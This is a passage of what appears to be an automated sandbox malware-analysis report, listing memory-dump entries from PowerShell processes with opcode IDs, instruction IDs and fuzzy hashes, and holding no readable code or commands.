                                                                                                      • Instruction Fuzzy Hash: 65C15863F1EA8A4FEBA9ABA848645B5BBD1EF55314B0801FFD05DCB1D7DA18AC00C341
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1888627685.00007FFD9A3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3D0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9a3d0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b8e53674b9d48713619c11c7b18288443d1e300c0a1764e00308eca03dbef5a4
                                                                                                      • Instruction ID: 1f2bc574ef364e2600021f597340e0a68e534603e89cde525a57bfeedd04dcd1
                                                                                                      • Opcode Fuzzy Hash: b8e53674b9d48713619c11c7b18288443d1e300c0a1764e00308eca03dbef5a4
                                                                                                      • Instruction Fuzzy Hash: 88411A7290CB888FDB19DF5C9C5A6A97FE0FB55310F0442AFD09983292DA64B805CBC2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1887449037.00007FFD9A2BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A2BD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9a2bd000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 01f6ca2d226138ae839f4f74969df0b575565569ad7ad3441030708fda0f45bf
                                                                                                      • Instruction ID: c69fa388e360e2853892ac7cdbbf6cea09687750499f2d4fd00ebcbed2b29c2d
                                                                                                      • Opcode Fuzzy Hash: 01f6ca2d226138ae839f4f74969df0b575565569ad7ad3441030708fda0f45bf
                                                                                                      • Instruction Fuzzy Hash: 9C31687140DFC04FE79A8B3998559523FF0EF57324B1906DFE088CB1A3D625A84AC7A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1888627685.00007FFD9A3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3D0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9a3d0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 71a385a83251d78a588f5055e9adf61bb46b28c17a4f5cfa4265d8984fe34744
                                                                                                      • Instruction ID: f6cea49e3a5421350c910b4bd5b1ded9bcdbf1e0497dd436f0eb70451624a333
                                                                                                      • Opcode Fuzzy Hash: 71a385a83251d78a588f5055e9adf61bb46b28c17a4f5cfa4265d8984fe34744
                                                                                                      • Instruction Fuzzy Hash: CB21063190C64C8FDB59DFAC984A7E97BE0EB96320F04426FD049C3162DA74A846CB92
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1888627685.00007FFD9A3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3D0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9a3d0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ffad81f0d31ffcf0ee4c1b00808a6dc997dceec43e49fe34eb2a6a53f1f1d727
                                                                                                      • Instruction ID: a2a048d8b86a31643448502a6dab94887ee9ed92e656bc87e3d0d679e6c4a2b8
                                                                                                      • Opcode Fuzzy Hash: ffad81f0d31ffcf0ee4c1b00808a6dc997dceec43e49fe34eb2a6a53f1f1d727
                                                                                                      • Instruction Fuzzy Hash: 6221E862E1D3968EE705BFB858764E47B60EF51308F4C42FBD49C8B0E7ED2964588392
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1888627685.00007FFD9A3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3D0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9a3d0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction ID: a6e1be5e3be57ef2dbe19f221e6eae776fa87101a154c31f7b8f629b7424a449
                                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction Fuzzy Hash: 3201A73121CB0C8FD748EF4CE451AA5B7E0FB85324F10056EE58AC3695DB36E882CB42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1889717004.00007FFD9A4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9a4a0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a7b9e131dc41957eb2cbf3604bf29f0d2bcc6d732d628006fcc042021894edc9
                                                                                                      • Instruction ID: f1818b704590e5d53726bfd840f7949bf3d1098c2105ac4343f366ee109148d3
                                                                                                      • Opcode Fuzzy Hash: a7b9e131dc41957eb2cbf3604bf29f0d2bcc6d732d628006fcc042021894edc9
                                                                                                      • Instruction Fuzzy Hash: F4F0BE32B4C5048FD769EA4CE8558A873E0EF5532471100FBE16DC71A7CA2AEC44C781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1889717004.00007FFD9A4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9a4a0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8aa28dcc943f44665c16a203e57b1e993cfec3caba790d11c217ee97ac96d1a9
                                                                                                      • Instruction ID: 971c9534061b5079fa710ec40aec37966901b8cfc4f4f5903f60735128021dfc
                                                                                                      • Opcode Fuzzy Hash: 8aa28dcc943f44665c16a203e57b1e993cfec3caba790d11c217ee97ac96d1a9
                                                                                                      • Instruction Fuzzy Hash: 4CF0BE32A0C5448FD768EA4CE8518E877E0EF4532476100F6E15EC70A7CA2ABC44C780
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1889717004.00007FFD9A4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9a4a0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction ID: 4a7b6355fa95d3d0e34cf2de6f8ce08bfe2fb4097a46c67d3966f158b1e8b2f7
                                                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction Fuzzy Hash: 82E01A32B4C8088FDAB8DA4CE0549AD73E1EBA833171101B7D14EC7561CA22EC518BC0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1888627685.00007FFD9A3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3D0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9a3d0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                                                      • API String ID: 0-962139525
                                                                                                      • Opcode ID: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                                                      • Instruction ID: 31e3112f5b97b28b8e4af51f1f69f047662d2091de191f17caa5a0cd9c08e063
                                                                                                      • Opcode Fuzzy Hash: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                                                      • Instruction Fuzzy Hash: 9621B3B3A145158AD3013FBCBC529D87780DB9426938A03F7E02CCF197E918649A8AC1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2093079080.00007FFD9A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A490000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd9a490000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9463ec90b2d49d18d9a3f25f7f46dc670c7deda37fc92604badb725ce749e223
                                                                                                      • Instruction ID: 6113714751609db3ad91a468a89bcf671eb2c6f7b4bf2345e94f753c1e348559
                                                                                                      • Opcode Fuzzy Hash: 9463ec90b2d49d18d9a3f25f7f46dc670c7deda37fc92604badb725ce749e223
                                                                                                      • Instruction Fuzzy Hash: 0BD16923A1EA894FEBA9DBA848745B5BBD0EF95754B0801FFD05DCB0D3DA18AC11C342
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2090078490.00007FFD9A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3C0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd9a3c0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d64aa556e7d85c7798be5a783305eb32c5da4870242bf1cf9bf2a38c58ad4e1d
                                                                                                      • Instruction ID: 6bbf42694533e38b4e0231f57c7eacbee5e00425bd21876745e2de4a0c94c3a5
                                                                                                      • Opcode Fuzzy Hash: d64aa556e7d85c7798be5a783305eb32c5da4870242bf1cf9bf2a38c58ad4e1d
                                                                                                      • Instruction Fuzzy Hash: 8341D557E1E6924FE712BFACACB24E97B60DF52259B0D01BBD0AC8A097DC14644983D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2090078490.00007FFD9A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3C0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd9a3c0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4ee61a05ae8bc1c53e0c2904f5bc9b44d107d7efb13bc2810dcfe383160a0568
                                                                                                      • Instruction ID: e4d33baff42525c79ad4e1977f267cc71631ecc044a2545cf31b717ecd6b0a15
                                                                                                      • Opcode Fuzzy Hash: 4ee61a05ae8bc1c53e0c2904f5bc9b44d107d7efb13bc2810dcfe383160a0568
                                                                                                      • Instruction Fuzzy Hash: 9B413B72A0DA488FDB5CAF5C9C166B8BBE0FB95310F00416FE44983296DB20B805CBC2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2090078490.00007FFD9A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3C0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd9a3c0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8135f577fc076eebaee32df8d9ad896df8e488841663f6079f1a49853f30b808
                                                                                                      • Instruction ID: 4614db2aee19d6c1fec45f20facd005bf5e99c7e303419fe8b1651cc7f65b368
                                                                                                      • Opcode Fuzzy Hash: 8135f577fc076eebaee32df8d9ad896df8e488841663f6079f1a49853f30b808
                                                                                                      • Instruction Fuzzy Hash: 6331F67190D7884FEB5A9BA888596A97FF0DF93320F0841EFC049C71A3D668544ACB52
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2088706726.00007FFD9A2AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A2AD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd9a2ad000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d4e3f3e588fd39ab20935bc585f1e660d6db3fc0571b42db43634013698678ef
                                                                                                      • Instruction ID: 61eeace44d921c660b0262e2b403d95f4372fb22f396d1e8b52f7d2e35171fb9
                                                                                                      • Opcode Fuzzy Hash: d4e3f3e588fd39ab20935bc585f1e660d6db3fc0571b42db43634013698678ef
                                                                                                      • Instruction Fuzzy Hash: FC41237140DBC45FE76A8B78AC559523FF0EF52324B1906DFD088CB1E3D629A84AC792
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2090078490.00007FFD9A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3C0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd9a3c0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                      • Instruction ID: 1487099e010d57842d784938892b523a6e9cd6043c5fe3818f4c97f125e731fa
                                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                      • Instruction Fuzzy Hash: E801A73121CB0C4FD748EF4CE451AA5B7E0FB85324F10056EE58AC3695DA36E882CB42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2093079080.00007FFD9A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A490000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd9a490000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3348da4b70c8f1b1b58779bf7cbc44fbe871fa40a4d430c179a67aa3434e6f3e
                                                                                                      • Instruction ID: e15722cd195b5f342e539f2c9da8c7b04c15ff46994dd17b873bf53c105ac316
                                                                                                      • Opcode Fuzzy Hash: 3348da4b70c8f1b1b58779bf7cbc44fbe871fa40a4d430c179a67aa3434e6f3e
                                                                                                      • Instruction Fuzzy Hash: 50F0BE32B4C5048FD769EA4CE8568A873E0EF9532471100FBE16DC72A7CA2AEC54C781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2093079080.00007FFD9A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A490000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd9a490000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3fa294a291eb9024b2b54e91cf40ade17ded08fa61350ff9b3a219c04e3af164
                                                                                                      • Instruction ID: 3c736054243bdbbf88e9e311e75c051f35cca70b3293b55cf448977217f0b561
                                                                                                      • Opcode Fuzzy Hash: 3fa294a291eb9024b2b54e91cf40ade17ded08fa61350ff9b3a219c04e3af164
                                                                                                      • Instruction Fuzzy Hash: 83F0BE32A0C5448FDB68EA4CE8518A877E0EF4532476100F6E15EC70A7DA2AAC54C781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2093079080.00007FFD9A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A490000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd9a490000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction ID: cf81476f5dc2e54a98e3669ef6eed0a4c78c39e0a71f47ab0a1038c35c4d0319
                                                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction Fuzzy Hash: 69E01A32B4C8088FDABCDA4CE0559A973E1EB9833171101B7D14EC7661CB22EC618BC0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2090078490.00007FFD9A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3C0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd9a3c0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: N_^4$N_^7$N_^F$N_^J
                                                                                                      • API String ID: 0-3508309026
                                                                                                      • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                                      • Instruction ID: f82343837002a102c64a77db61b0c88949950600e368b7b1ac120855d3747233
                                                                                                      • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                                      • Instruction Fuzzy Hash: E42138B7B191254ED3017FBCBC259D93B40DFD423874902B2D2ACCF187E914709A8AC2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2296443819.00007FFD9A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A480000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a480000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c75e0f86ddc6b74f51e5fade2119c794ece1413a343536aa1ea70543190a5c1a
                                                                                                      • Instruction ID: 4f85644c13d6791c1d540b0f99257b7f518327a81ea5b725276f051aa07ec1c3
                                                                                                      • Opcode Fuzzy Hash: c75e0f86ddc6b74f51e5fade2119c794ece1413a343536aa1ea70543190a5c1a
                                                                                                      • Instruction Fuzzy Hash: 92D14822A1EAC94FEBA9EBAC58655B5BBD1EF15314B0801FFD05DCF0D7DA28A801C341
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0e68c7e17f199b79b881b9ffe63fae7e6e8d1a06cc9e7c4ad1a0608bbbdb3e84
                                                                                                      • Instruction ID: 1db597006ab771b742da5046f285c7938e736174f45f0608ee2e9d89b4f7e995
                                                                                                      • Opcode Fuzzy Hash: 0e68c7e17f199b79b881b9ffe63fae7e6e8d1a06cc9e7c4ad1a0608bbbdb3e84
                                                                                                      • Instruction Fuzzy Hash: CA51C867F1D6D28BD711BBBCA8F61E93B50DFC2229B0C44B7D09C8A0A7DC14149E86D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3d733137211c364097d23a694ce6585aab03ff03de0183cdfa3e349ba1fc2965
                                                                                                      • Instruction ID: 075873080afe9c13e900dc08755fa8a90cc32941a2085a3331a93074906d845e
                                                                                                      • Opcode Fuzzy Hash: 3d733137211c364097d23a694ce6585aab03ff03de0183cdfa3e349ba1fc2965
                                                                                                      • Instruction Fuzzy Hash: 9441177190CB884FEB199F6C9C5A6B97FE1FB55310F0441AFD09983293DA64A845CBC2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2293900007.00007FFD9A29D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A29D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a29d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9b439b9379e018556313ee90ba567a47b944503d56ac114e0ac0a494412e73b8
                                                                                                      • Instruction ID: 953888a2db64b519ca21c46fd43995353efe1284b72779e2889937326f7453ae
                                                                                                      • Opcode Fuzzy Hash: 9b439b9379e018556313ee90ba567a47b944503d56ac114e0ac0a494412e73b8
                                                                                                      • Instruction Fuzzy Hash: 5941267140DBC44FE75A8B289851A523FF4EF97724B1906DFD088CF1A3D629E846C7A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ab4949c03e8f3990ea6ce19cb44266f5e27d34dbe6286829509c3595080bc569
                                                                                                      • Instruction ID: 292ba8bac13c1f0b61ff68df26a5407d4197ee099e1bd821634841f291ac7898
                                                                                                      • Opcode Fuzzy Hash: ab4949c03e8f3990ea6ce19cb44266f5e27d34dbe6286829509c3595080bc569
                                                                                                      • Instruction Fuzzy Hash: E121F87190CA4C4FDB59DBAC984A7F97BE0EB96331F04416BD048C3256DA74A406CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                      • Instruction ID: cfc95461bfc77d5df945192b32c47d671371e64b5bc97e460da5dcdd76dbf12d
                                                                                                      • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                      • Instruction Fuzzy Hash: 2E01A73121CB0C4FD748EF4CE451AB6B7E0FB85324F10056EE58AC3695DA36E882CB42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2296443819.00007FFD9A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A480000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a480000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0a1cb3dfe68afd0579823bd057627fe9c7c0c05482fef47d7ee1944eab871556
                                                                                                      • Instruction ID: bca730dba09b891e92cb53089eb94b5c99f46dec363e0767758fe424950f051c
                                                                                                      • Opcode Fuzzy Hash: 0a1cb3dfe68afd0579823bd057627fe9c7c0c05482fef47d7ee1944eab871556
                                                                                                      • Instruction Fuzzy Hash: C8F0BE32B4C5048FD769EA4CE8558A873E0EF5532571200FBE16DCB1A7CA3AEC44C781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2296443819.00007FFD9A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A480000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a480000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4d922299f8a4d902b856d474f4a3a48e6eec9653aec5e0058a441569dadce7d5
                                                                                                      • Instruction ID: f290821bad43fb0898d4e6e428188b97ba7d32ac33a8e15a03e449228df04464
                                                                                                      • Opcode Fuzzy Hash: 4d922299f8a4d902b856d474f4a3a48e6eec9653aec5e0058a441569dadce7d5
                                                                                                      • Instruction Fuzzy Hash: DEF0BE32A0C5448FD768EA4CE8518A877E0EF05724B6100F6E15ECB0A7CA2AAC44C780
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2296443819.00007FFD9A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A480000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a480000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction ID: 04e587ef4f74a230f1638d53a30199f96beea9608b349cbfb2f5c11fc9524e70
                                                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction Fuzzy Hash: F6E01A32B4C8088FDAB8DA4CF0549A973E1EB9833171101B7D14ECB561CA32EC518BC0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: O_^$O_^$O_^$O_^$O_^$O_^$O_^$O_^$O_^$O_^$O_^
                                                                                                      • API String ID: 0-4246338644
                                                                                                      • Opcode ID: 86fd3529325349246c07c4e11e90cf56dc8119b0881a85801cc10816e078eec0
                                                                                                      • Instruction ID: d19f151a2b1381ac5461970008b019fb5113df00c4e03d0f4d080fa2d7afba1b
                                                                                                      • Opcode Fuzzy Hash: 86fd3529325349246c07c4e11e90cf56dc8119b0881a85801cc10816e078eec0
                                                                                                      • Instruction Fuzzy Hash: 6551B4A3A0E7C24FF35752A849B42653FA1EF93354F1D51FBC0A94F1E3E958180A8356
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: O_^8$O_^<$O_^?$O_^J$O_^K$O_^N$O_^Q$O_^Y
                                                                                                      • API String ID: 0-3814653101
                                                                                                      • Opcode ID: 767dc838b8e3e9580db012fdc19fa58d9d18fd9b3128ba9e1fe4c8e4c2756401
                                                                                                      • Instruction ID: 3f2f674582fba1d4519b9254b7fa3ae1b79ca93150f6c6a606e786123a5ceef0
                                                                                                      • Opcode Fuzzy Hash: 767dc838b8e3e9580db012fdc19fa58d9d18fd9b3128ba9e1fe4c8e4c2756401
                                                                                                      • Instruction Fuzzy Hash: 0821D0B3A255114AD3023FBDBC529E86780DB9477A34902F3E02DCF297D918A49B86C1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: O_^$O_^$O_^$O_^$O_^$O_^
                                                                                                      • API String ID: 0-3255002459
                                                                                                      • Opcode ID: ddace57225b721f1eeac571684e3a421a9308b82336d885533d1526e9246d893
                                                                                                      • Instruction ID: d67c9cd311de69d90b931a0f0932ade619a6d9f33b9104366cfe90a2b14a780c
                                                                                                      • Opcode Fuzzy Hash: ddace57225b721f1eeac571684e3a421a9308b82336d885533d1526e9246d893
                                                                                                      • Instruction Fuzzy Hash: 041186A3E0E7C2CEF25612A54DF90653FA06E53315B0E44FBD0EE5F1E3E804180A8692
                                                                                                      Strings
                                                                                                      Memory Dump Source
